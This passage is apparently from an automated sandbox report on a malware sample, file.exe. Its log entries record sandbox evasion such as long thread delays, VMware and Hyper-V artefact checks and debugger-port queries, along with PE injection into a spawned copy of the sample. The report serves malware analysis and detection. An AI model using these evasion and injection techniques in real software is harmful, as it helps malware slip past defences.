                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7568, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exeMemory allocated: D80000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory allocated: 29F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory allocated: D80000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory allocated: 7850000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory allocated: 8850000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory allocated: 8A00000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory allocated: 9A00000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory allocated: 1580000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory allocated: 3090000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory allocated: 5090000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599890Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599781Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599671Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599562Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599453Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599343Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599234Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599125Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599015Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598906Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598797Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598672Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598562Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598453Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598343Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598234Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598125Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598015Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 597906Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 597797Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 597672Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 597541Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 597437Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 597328Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 597219Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 597109Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 597000Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 596890Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 596781Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 596672Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 596562Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 596453Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 596344Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 596219Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 596109Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 596000Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 595890Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 595781Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 595672Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 595562Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 595453Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 595343Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 595234Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 595125Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 595015Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 594906Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 594797Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 594687Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 594578Jump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 9013Jump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 851Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -24903104499507879s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -599890s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 5480Thread sleep count: 9013 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -599781s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 5480Thread sleep count: 851 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -599671s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -599562s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -599453s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -599343s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -599234s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -599125s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -599015s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -598906s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -598797s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -598672s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -598562s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -598453s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -598343s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -598234s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -598125s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -598015s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -597906s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -597797s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -597672s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -597541s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -597437s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -597328s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -597219s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -597109s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -597000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -596890s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -596781s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -596672s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -596562s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -596453s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -596344s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -596219s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -596109s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -596000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -595890s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -595781s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -595672s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -595562s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -595453s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -595343s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -595234s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -595125s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -595015s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -594906s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -594797s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -594687s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -594578s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599890Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599781Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599671Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599562Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599453Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599343Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599234Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599125Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599015Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598906Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598797Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598672Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598562Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598453Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598343Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598234Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598125Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598015Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 597906Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 597797Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 597672Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 597541Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 597437Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 597328Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 597219Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 597109Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 597000Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 596890Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 596781Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 596672Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 596562Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 596453Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 596344Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 596219Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 596109Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 596000Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 595890Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 595781Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 595672Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 595562Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 595453Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 595343Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 595234Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 595125Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 595015Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 594906Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 594797Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 594687Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 594578Jump to behavior
                Source: Amcache.hve.5.drBinary or memory string: VMware
                Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
                Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
                Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: file.exe, 00000002.00000002.4143692345.0000000001456000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllintC
                Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: file.exeBinary or memory string: vMCI96
                Source: Amcache.hve.5.drBinary or memory string: vmci.sys
                Source: Amcache.hve.5.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
                Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
                Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.5.drBinary or memory string: VMware20,1
                Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\file.exeMemory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"Jump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
